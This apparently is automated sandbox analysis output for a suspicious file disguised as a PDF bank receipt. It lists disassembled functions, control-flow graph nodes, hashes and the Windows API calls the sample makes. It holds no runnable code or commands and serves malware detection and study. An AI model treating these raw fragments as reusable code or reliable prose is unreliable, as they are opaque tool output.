                                                                                                                                                          • Opcode Fuzzy Hash: 33c11db83d2f39ebcbdcf0947edf39aaf33fb14859f6c7e420d5c3021808bab2
                                                                                                                                                          • Instruction Fuzzy Hash: 0C21F471E156199BEB18CFABD84069EFBF7FFC8210F14C06AD508A7254DB305A158BA1
                                                                                                                                                          Function 056F7DD8 Relevance: 7.8, Strings: 6, Instructions: 329COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (okq$(okq$,oq$,oq$Hoq$d8pq
                                                                                                                                                          • API String ID: 0-157866490
                                                                                                                                                          • Opcode ID: ffc9806abbecc9d3200541c3436fbd67115faf8a5c4bb526bcdf4e040f97dbc9
                                                                                                                                                          • Instruction ID: 1db5aed2472be65f4ec6c37e92d8a52aea4ba24ef0550af59e236be4cca68232
                                                                                                                                                          • Opcode Fuzzy Hash: ffc9806abbecc9d3200541c3436fbd67115faf8a5c4bb526bcdf4e040f97dbc9
                                                                                                                                                          • Instruction Fuzzy Hash: 4CC13C30B002199FCB14DF69D958AAE7BB6FF88750F148069EA06E77A0DB35DC41CB91

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:10.9%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:81
                                                                                                                                                          Total number of Limit Nodes:3
                                                                                                                                                          execution_graph 31697 55c9408 31698 55c944d MessageBoxW 31697->31698 31700 55c9494 31698->31700 31701 55c5f04 31703 55c5f0a 31701->31703 31702 55c6027 31728 55c9530 31702->31728 31734 55c9540 31702->31734 31704 55c607b 31703->31704 31711 55c6b98 31703->31711 31715 55c6b70 31703->31715 31719 55c6b60 31703->31719 31723 55c6bd0 31703->31723 31713 55c6ba8 31711->31713 31712 55c6bc5 31712->31702 31713->31712 31739 55c68f4 31713->31739 31716 55c6b79 31715->31716 31759 55c68e4 31716->31759 31720 55c6b70 31719->31720 31721 55c68e4 2 API calls 31720->31721 31722 55c6b84 31721->31722 31722->31702 31724 55c6bac 31723->31724 31727 55c6bda 31723->31727 31725 55c6bc5 31724->31725 31726 55c68f4 DuplicateHandle 31724->31726 31725->31702 31726->31725 31727->31702 31729 55c9540 31728->31729 31730 55c6b98 DuplicateHandle 31729->31730 31731 55c9548 31730->31731 31777 55c7bf4 31731->31777 31735 55c6b98 DuplicateHandle 31734->31735 31736 55c9548 31735->31736 31737 55c7bf4 2 API calls 31736->31737 31738 55c9553 31737->31738 31738->31704 31740 55c68ff 31739->31740 31745 55c7320 31740->31745 31749 55c7330 31740->31749 31752 55c732b 31740->31752 31741 55c7283 31741->31712 31746 55c7336 31745->31746 31748 55c735e 31746->31748 31756 55c6f9c 31746->31756 31748->31741 31750 55c6f9c DuplicateHandle 31749->31750 31751 55c735e 31750->31751 31751->31741 31753 55c7330 31752->31753 31754 55c6f9c DuplicateHandle 31753->31754 31755 55c735e 31754->31755 31755->31741 31757 55c7398 DuplicateHandle 31756->31757 31758 55c742e 31757->31758 31758->31748 31760 55c68ef 31759->31760 31763 55c7a10 31760->31763 31765 55c7a1b 31763->31765 31764 55c7d7a 31765->31764 31766 55c6b98 DuplicateHandle 31765->31766 31767 55c7e73 31766->31767 31770 55c7af4 31767->31770 31769 55c7e7c 31771 55c7aff 31770->31771 31772 55c8193 31771->31772 31774 55c7b10 31771->31774 31772->31769 31775 55c81c8 OleInitialize 31774->31775 31776 55c822c 31775->31776 31776->31772 31778 55c7bff 31777->31778 31783 55c7c04 31778->31783 31781 55c7a10 2 API calls 31782 55c95a2 31781->31782 31784 55c7c0f 31783->31784 31785 55c958c 31784->31785 31787 55c91d8 DuplicateHandle 31784->31787 31785->31781 31787->31785 31788 55c7db7 31791 55c7a20 31788->31791 31792 55c7a2b 31791->31792 31796 55c8f88 31792->31796 31800 55c8f79 31792->31800 31793 55c7dc4 31797 55c8fd7 31796->31797 31804 55c7b7c 31797->31804 31801 55c8f88 31800->31801 31802 55c7b7c EnumThreadWindows 31801->31802 31803 55c9058 31802->31803 31803->31793 31806 55c9078 EnumThreadWindows 31804->31806 31807 55c9058 31806->31807 31807->31793

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00EB6FC8 Relevance: 6.7, Strings: 5, Instructions: 467COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 149 eb6fc8-eb6ffe 150 eb7006-eb700c 149->150 286 eb7000 call eb6fc8 149->286 287 eb7000 call eb7118 149->287 288 eb7000 call eb69a0 149->288 151 eb700e-eb7012 150->151 152 eb705c-eb7060 150->152 153 eb7021-eb7028 151->153 154 eb7014-eb7019 151->154 155 eb7062-eb7071 152->155 156 eb7077-eb708b 152->156 159 eb70fe-eb713b 153->159 160 eb702e-eb7035 153->160 154->153 157 eb709d-eb70a7 155->157 158 eb7073-eb7075 155->158 161 eb7093-eb709a 156->161 283 eb708d call eba0e8 156->283 284 eb708d call eba088 156->284 285 eb708d call eb9dd0 156->285 163 eb70a9-eb70af 157->163 164 eb70b1-eb70b5 157->164 158->161 171 eb713d-eb7143 159->171 172 eb7146-eb7166 159->172 160->152 162 eb7037-eb703b 160->162 165 eb704a-eb7051 162->165 166 eb703d-eb7042 162->166 167 eb70bd-eb70f7 163->167 164->167 169 eb70b7 164->169 165->159 170 eb7057-eb705a 165->170 166->165 167->159 169->167 170->161 171->172 177 eb7168 172->177 178 eb716d-eb7174 172->178 180 eb74fc-eb7505 177->180 181 eb7176-eb7181 178->181 182 eb750d 181->182 183 eb7187-eb719a 181->183 187 eb750e-eb7511 182->187 188 eb719c-eb71aa 183->188 189 eb71b0-eb71cb 183->189 190 eb74df-eb74e0 187->190 191 eb7512-eb7519 187->191 188->189 205 eb7484-eb748b 188->205 202 eb71ef-eb71f2 189->202 203 eb71cd-eb71d3 189->203 192 eb74e2-eb74e4 190->192 193 eb74b6-eb74b9 190->193 194 eb751b-eb7521 191->194 195 eb7506 191->195 196 eb7508 192->196 197 eb74e6-eb74e9 192->197 193->196 198 eb74bb-eb74c0 193->198 194->187 201 eb7523-eb7549 194->201 195->196 196->182 210 eb74f0-eb74f3 197->210 198->192 204 eb74c2-eb74c4 198->204 217 eb754b-eb7550 201->217 218 eb7552-eb7556 201->218 211 eb71f8-eb71fb 202->211 212 eb734c-eb7352 202->212 206 eb71dc-eb71df 203->206 207 eb71d5 203->207 213 eb74d3-eb74d9 204->213 214 eb74c6-eb74cb 204->214 205->180 209 eb748d-eb748f 205->209 216 eb7212-eb7218 206->216 219 eb71e1-eb71e4 206->219 207->206 207->212 215 eb743e-eb7441 207->215 207->216 220 eb749e-eb74a4 209->220 221 eb7491-eb7496 209->221 210->196 222 eb74f5-eb74fa 210->222 211->212 224 eb7201-eb7207 211->224 212->215 223 eb7358-eb735d 212->223 213->182 225 eb74db 213->225 214->213 215->196 231 eb7447-eb744d 215->231 232 eb721a-eb721c 216->232 233 eb721e-eb7220 216->233 226 eb755c-eb755d 217->226 218->226 227 eb71ea 219->227 228 eb727e-eb7284 219->228 220->182 229 eb74a6-eb74ab 220->229 221->220 222->180 222->209 223->215 224->212 230 eb720d 224->230 225->190 227->215 228->215 235 eb728a-eb7290 228->235 229->210 234 eb74ad-eb74b2 229->234 230->215 236 eb744f-eb7457 231->236 237 eb7472-eb7476 231->237 238 eb722a-eb7233 232->238 233->238 234->196 240 eb74b4 234->240 241 eb7292-eb7294 235->241 242 eb7296-eb7298 235->242 236->182 243 eb745d-eb746c 236->243 237->205 239 eb7478-eb747e 237->239 244 eb7246-eb726e 238->244 245 eb7235-eb7240 238->245 239->181 239->205 240->198 246 eb72a2-eb72b9 241->246 242->246 243->189 243->237 257 eb7362-eb7398 244->257 258 eb7274-eb7279 244->258 245->215 245->244 251 eb72bb-eb72d4 246->251 252 eb72e4-eb730b 246->252 251->257 261 eb72da-eb72df 251->261 252->196 263 eb7311-eb7314 252->263 264 eb739a-eb739e 257->264 265 eb73a5-eb73ad 257->265 258->257 261->257 263->196 266 eb731a-eb7343 263->266 267 eb73bd-eb73c1 264->267 268 eb73a0-eb73a3 264->268 265->196 269 eb73b3-eb73b8 265->269 266->257 281 eb7345-eb734a 266->281 270 eb73c3-eb73c9 267->270 271 eb73e0-eb73e4 267->271 268->265 268->267 269->215 270->271 273 eb73cb-eb73d3 270->273 274 eb73ee-eb740d call eb76f1 271->274 275 eb73e6-eb73ec 271->275 273->196 276 eb73d9-eb73de 273->276 278 eb7413-eb7417 274->278 275->274 275->278 276->215 278->215 279 eb7419-eb7435 278->279 279->215 281->257 283->161 284->161 285->161 286->150 287->150 288->150
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (okq$(okq$(okq$,oq$,oq
                                                                                                                                                          • API String ID: 0-3760967313
                                                                                                                                                          • Opcode ID: 2ed1b6a19e8dc16abf90be83693faff7069900c8e32b1cf5645c0c71c3e95c9b
                                                                                                                                                          • Instruction ID: 537f2b16c8c7de5069d6c2686c5894715da05ab7b844bd9b3f7197a597f21b60
                                                                                                                                                          • Opcode Fuzzy Hash: 2ed1b6a19e8dc16abf90be83693faff7069900c8e32b1cf5645c0c71c3e95c9b
                                                                                                                                                          • Instruction Fuzzy Hash: 5B125C70A08209DFCB15CF68C984AEEBBF2BF88305F259069E895BB661D734DD41CB50
                                                                                                                                                          Function 00EBCCD8 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 414 ebccd8-ebcd08 416 ebcd0a 414->416 417 ebcd0f-ebcdec call eb41a0 call eb3cc0 414->417 416->417 427 ebcdee 417->427 428 ebcdf3-ebce14 call eb5658 417->428 427->428 430 ebce19-ebce24 428->430 431 ebce2b-ebce2f 430->431 432 ebce26 430->432 433 ebce31-ebce32 431->433 434 ebce34-ebce3b 431->434 432->431 435 ebce53-ebce97 433->435 436 ebce3d 434->436 437 ebce42-ebce50 434->437 441 ebcefd-ebcf14 435->441 436->437 437->435 443 ebce99-ebceaf 441->443 444 ebcf16-ebcf3b 441->444 447 ebced9 443->447 448 ebceb1-ebcebd 443->448 450 ebcf3d-ebcf52 444->450 451 ebcf53 444->451 454 ebcedf-ebcefc 447->454 452 ebcebf-ebcec5 448->452 453 ebcec7-ebcecd 448->453 450->451 455 ebced7 452->455 453->455 454->441 455->454
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215
                                                                                                                                                          • Opcode ID: ba44dafc9dd55db3b49d1c047e81df0b6c86f50da5c847c293dfcdd0f2c6b6bd
                                                                                                                                                          • Instruction ID: e10a87e601920fa8e445a82c7ccb90e5a93d513842486317251a881fc52ac759
                                                                                                                                                          • Opcode Fuzzy Hash: ba44dafc9dd55db3b49d1c047e81df0b6c86f50da5c847c293dfcdd0f2c6b6bd
                                                                                                                                                          • Instruction Fuzzy Hash: A581A474E04218DFDB14DFAAD984A9EBBF2BF88300F24D069E419BB265DB349941CF50
                                                                                                                                                          Function 00EBC468 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 459 ebc468-ebc498 460 ebc49a 459->460 461 ebc49f-ebc57c call eb41a0 call eb3cc0 459->461 460->461 471 ebc57e 461->471 472 ebc583-ebc5a4 call eb5658 461->472 471->472 474 ebc5a9-ebc5b4 472->474 475 ebc5bb-ebc5bf 474->475 476 ebc5b6 474->476 477 ebc5c1-ebc5c2 475->477 478 ebc5c4-ebc5cb 475->478 476->475 479 ebc5e3-ebc627 477->479 480 ebc5cd 478->480 481 ebc5d2-ebc5e0 478->481 485 ebc68d-ebc6a4 479->485 480->481 481->479 487 ebc629-ebc63f 485->487 488 ebc6a6-ebc6cb 485->488 492 ebc669 487->492 493 ebc641-ebc64d 487->493 495 ebc6cd-ebc6e2 488->495 496 ebc6e3 488->496 494 ebc66f-ebc68c 492->494 497 ebc64f-ebc655 493->497 498 ebc657-ebc65d 493->498 494->485 495->496 499 ebc667 497->499 498->499 499->494
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215
                                                                                                                                                          • Opcode ID: ce1543aa885f37889113cc0d8ad2903eec0c19f2118e6c8010610325c6b0f137
                                                                                                                                                          • Instruction ID: ec0a4be5c3204b4cbaa703afea6175ca734439eae78b37d54ab06d5082aa68c2
                                                                                                                                                          • Opcode Fuzzy Hash: ce1543aa885f37889113cc0d8ad2903eec0c19f2118e6c8010610325c6b0f137
                                                                                                                                                          • Instruction Fuzzy Hash: CE81A374E05218DFDB14DFAAD984ADEBBF2BF88300F249069E419BB265DB349941CF50
                                                                                                                                                          Function 00EBC19C Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 549 ebc19c-ebc1a1 550 ebc1b9-ebc1c8 549->550 551 ebc1a3-ebc1b8 549->551 552 ebc1ca 550->552 553 ebc1cf-ebc2ac call eb41a0 call eb3cc0 550->553 551->550 552->553 563 ebc2ae 553->563 564 ebc2b3-ebc2d4 call eb5658 553->564 563->564 566 ebc2d9-ebc2e4 564->566 567 ebc2eb-ebc2ef 566->567 568 ebc2e6 566->568 569 ebc2f1-ebc2f2 567->569 570 ebc2f4-ebc2fb 567->570 568->567 571 ebc313-ebc357 569->571 572 ebc2fd 570->572 573 ebc302-ebc310 570->573 577 ebc3bd-ebc3d4 571->577 572->573 573->571 579 ebc359-ebc36f 577->579 580 ebc3d6-ebc3fb 577->580 584 ebc399 579->584 585 ebc371-ebc37d 579->585 587 ebc3fd-ebc412 580->587 588 ebc413 580->588 586 ebc39f-ebc3bc 584->586 589 ebc37f-ebc385 585->589 590 ebc387-ebc38d 585->590 586->577 587->588 591 ebc397 589->591 590->591 591->586
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215
                                                                                                                                                          • Opcode ID: edbc01d279238c499344a2d2a473af7b7f56989578bcb501f3b9b7b0fbe41339
                                                                                                                                                          • Instruction ID: 896544b306e8ba83aa6404921dcd300b8a29f945febd88544a70924120366622
                                                                                                                                                          • Opcode Fuzzy Hash: edbc01d279238c499344a2d2a473af7b7f56989578bcb501f3b9b7b0fbe41339
                                                                                                                                                          • Instruction Fuzzy Hash: 2281A474E05218CFDB14DFAAD884A9EBBF2BF89300F24D069E419BB265DB349945CF50
                                                                                                                                                          Function 00EB5370 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 503 eb5370-eb53a0 505 eb53a2 503->505 506 eb53a7-eb5484 call eb41a0 call eb3cc0 503->506 505->506 516 eb548b-eb54a9 506->516 517 eb5486 506->517 547 eb54ac call eb5649 516->547 548 eb54ac call eb5658 516->548 517->516 518 eb54b2-eb54bd 519 eb54bf 518->519 520 eb54c4-eb54c8 518->520 519->520 521 eb54ca-eb54cb 520->521 522 eb54cd-eb54d4 520->522 523 eb54ec-eb5530 521->523 524 eb54db-eb54e9 522->524 525 eb54d6 522->525 529 eb5596-eb55ad 523->529 524->523 525->524 531 eb55af-eb55d4 529->531 532 eb5532-eb5548 529->532 539 eb55ec 531->539 540 eb55d6-eb55eb 531->540 536 eb554a-eb5556 532->536 537 eb5572 532->537 541 eb5558-eb555e 536->541 542 eb5560-eb5566 536->542 538 eb5578-eb5595 537->538 538->529 540->539 543 eb5570 541->543 542->543 543->538 547->518 548->518
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215
                                                                                                                                                          • Opcode ID: 08261f7716ab048ef5bae5bbc9d1e0731286f60af9cc05c17f10f5c67a81fae0
                                                                                                                                                          • Instruction ID: 4b3bed331d889f94e26215e082e9ae08726e894ce3969b4ef7e1a942450d1b1a
                                                                                                                                                          • Opcode Fuzzy Hash: 08261f7716ab048ef5bae5bbc9d1e0731286f60af9cc05c17f10f5c67a81fae0
                                                                                                                                                          • Instruction Fuzzy Hash: DC81B374E01618CFDB14DFAAD984A9EBBF2BF88301F149069E419BB365DB349981CF50
                                                                                                                                                          Function 00EBC738 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 595 ebc738-ebc768 597 ebc76a 595->597 598 ebc76f-ebc84c call eb41a0 call eb3cc0 595->598 597->598 608 ebc84e 598->608 609 ebc853-ebc874 call eb5658 598->609 608->609 611 ebc879-ebc884 609->611 612 ebc88b-ebc88f 611->612 613 ebc886 611->613 614 ebc891-ebc892 612->614 615 ebc894-ebc89b 612->615 613->612 616 ebc8b3-ebc8f7 614->616 617 ebc89d 615->617 618 ebc8a2-ebc8b0 615->618 622 ebc95d-ebc974 616->622 617->618 618->616 624 ebc8f9-ebc90f 622->624 625 ebc976-ebc99b 622->625 629 ebc939 624->629 630 ebc911-ebc91d 624->630 631 ebc99d-ebc9b2 625->631 632 ebc9b3 625->632 635 ebc93f-ebc95c 629->635 633 ebc91f-ebc925 630->633 634 ebc927-ebc92d 630->634 631->632 636 ebc937 633->636 634->636 635->622 636->635
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215
                                                                                                                                                          • Opcode ID: 0a614ef698953c7cb6c0bf79790db375c7878a89717b77ccbaf4df5166ed2593
                                                                                                                                                          • Instruction ID: c5c071388a7d4954c7069dee8f82d4802fa65808d50af75ab9aeb07f4087c8a3
                                                                                                                                                          • Opcode Fuzzy Hash: 0a614ef698953c7cb6c0bf79790db375c7878a89717b77ccbaf4df5166ed2593
                                                                                                                                                          • Instruction Fuzzy Hash: AF819374E04218DFDB14DFAAD984A9EBBF2BF88300F249069E419BB265DB345941CF50
                                                                                                                                                          Function 00EBD278 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 685 ebd278-ebd2a8 686 ebd2aa 685->686 687 ebd2af-ebd38c call eb41a0 call eb3cc0 685->687 686->687 697 ebd38e 687->697 698 ebd393-ebd3b4 call eb5658 687->698 697->698 700 ebd3b9-ebd3c4 698->700 701 ebd3cb-ebd3cf 700->701 702 ebd3c6 700->702 703 ebd3d1-ebd3d2 701->703 704 ebd3d4-ebd3db 701->704 702->701 705 ebd3f3-ebd437 703->705 706 ebd3dd 704->706 707 ebd3e2-ebd3f0 704->707 711 ebd49d-ebd4b4 705->711 706->707 707->705 713 ebd439-ebd44f 711->713 714 ebd4b6-ebd4db 711->714 718 ebd479 713->718 719 ebd451-ebd45d 713->719 720 ebd4dd-ebd4f2 714->720 721 ebd4f3 714->721 724 ebd47f-ebd49c 718->724 722 ebd45f-ebd465 719->722 723 ebd467-ebd46d 719->723 720->721 725 ebd477 722->725 723->725 724->711 725->724
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215
                                                                                                                                                          • Opcode ID: 1596de64c3ec9e0514618b6465ceb9cc705995d81e7943d86c049fe5ce19c219
                                                                                                                                                          • Instruction ID: 573dd0ee3446829aca04f0e88970798e7f75933cc61d7379b5cdaa27b3aa959b
                                                                                                                                                          • Opcode Fuzzy Hash: 1596de64c3ec9e0514618b6465ceb9cc705995d81e7943d86c049fe5ce19c219
                                                                                                                                                          • Instruction Fuzzy Hash: F681B474E05218DFDB14DFAAD884ADEBBF2BF88300F149069E419BB265EB349945CF50
                                                                                                                                                          Function 00EBCFAA Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 640 ebcfaa-ebcfd8 642 ebcfda 640->642 643 ebcfdf-ebd0bc call eb41a0 call eb3cc0 640->643 642->643 653 ebd0be 643->653 654 ebd0c3-ebd0e4 call eb5658 643->654 653->654 656 ebd0e9-ebd0f4 654->656 657 ebd0fb-ebd0ff 656->657 658 ebd0f6 656->658 659 ebd101-ebd102 657->659 660 ebd104-ebd10b 657->660 658->657 661 ebd123-ebd167 659->661 662 ebd10d 660->662 663 ebd112-ebd120 660->663 667 ebd1cd-ebd1e4 661->667 662->663 663->661 669 ebd169-ebd17f 667->669 670 ebd1e6-ebd20b 667->670 674 ebd1a9 669->674 675 ebd181-ebd18d 669->675 677 ebd20d-ebd222 670->677 678 ebd223 670->678 676 ebd1af-ebd1cc 674->676 679 ebd18f-ebd195 675->679 680 ebd197-ebd19d 675->680 676->667 677->678 681 ebd1a7 679->681 680->681 681->676
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215
                                                                                                                                                          • Opcode ID: 6cc2a7092c47f3fdc36ee40a5877ca82081d9a0804967e3d35d16b61b7a6ee16
                                                                                                                                                          • Instruction ID: 86741b6545586fa8e42920b903da29a29f041803b3d456df210c3f469cea2ee0
                                                                                                                                                          • Opcode Fuzzy Hash: 6cc2a7092c47f3fdc36ee40a5877ca82081d9a0804967e3d35d16b61b7a6ee16
                                                                                                                                                          • Instruction Fuzzy Hash: AC819374E052188FDB54DFAAD984ADEBBF2BF88300F149069E419BB265EB349941CF50
                                                                                                                                                          Function 00EBCA08 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 729 ebca08-ebca38 730 ebca3a 729->730 731 ebca3f-ebcb1c call eb41a0 call eb3cc0 729->731 730->731 741 ebcb1e 731->741 742 ebcb23-ebcb44 call eb5658 731->742 741->742 744 ebcb49-ebcb54 742->744 745 ebcb5b-ebcb5f 744->745 746 ebcb56 744->746 747 ebcb61-ebcb62 745->747 748 ebcb64-ebcb6b 745->748 746->745 749 ebcb83-ebcbc7 747->749 750 ebcb6d 748->750 751 ebcb72-ebcb80 748->751 755 ebcc2d-ebcc44 749->755 750->751 751->749 757 ebcbc9-ebcbdf 755->757 758 ebcc46-ebcc6b 755->758 762 ebcc09 757->762 763 ebcbe1-ebcbed 757->763 764 ebcc6d-ebcc82 758->764 765 ebcc83 758->765 768 ebcc0f-ebcc2c 762->768 766 ebcbef-ebcbf5 763->766 767 ebcbf7-ebcbfd 763->767 764->765 769 ebcc07 766->769 767->769 768->755 769->768
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                                                                          • API String ID: 0-1749821215
                                                                                                                                                          • Opcode ID: b2909517ab9949cbcaae3ab765bf162164aa3c133f0d1579784e1389544f653e
                                                                                                                                                          • Instruction ID: 2f4838a4d92a80a27f14474ad0049748d8448e7fd1bb6d7ac3cbc694fd4a3655
                                                                                                                                                          • Opcode Fuzzy Hash: b2909517ab9949cbcaae3ab765bf162164aa3c133f0d1579784e1389544f653e
                                                                                                                                                          • Instruction Fuzzy Hash: 43819474E04218CFDB54DFAAD984A9EBBF2BF88300F249069E419BB265DB349945CF50
                                                                                                                                                          Function 00EB29EC Relevance: 5.5, Strings: 4, Instructions: 489COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
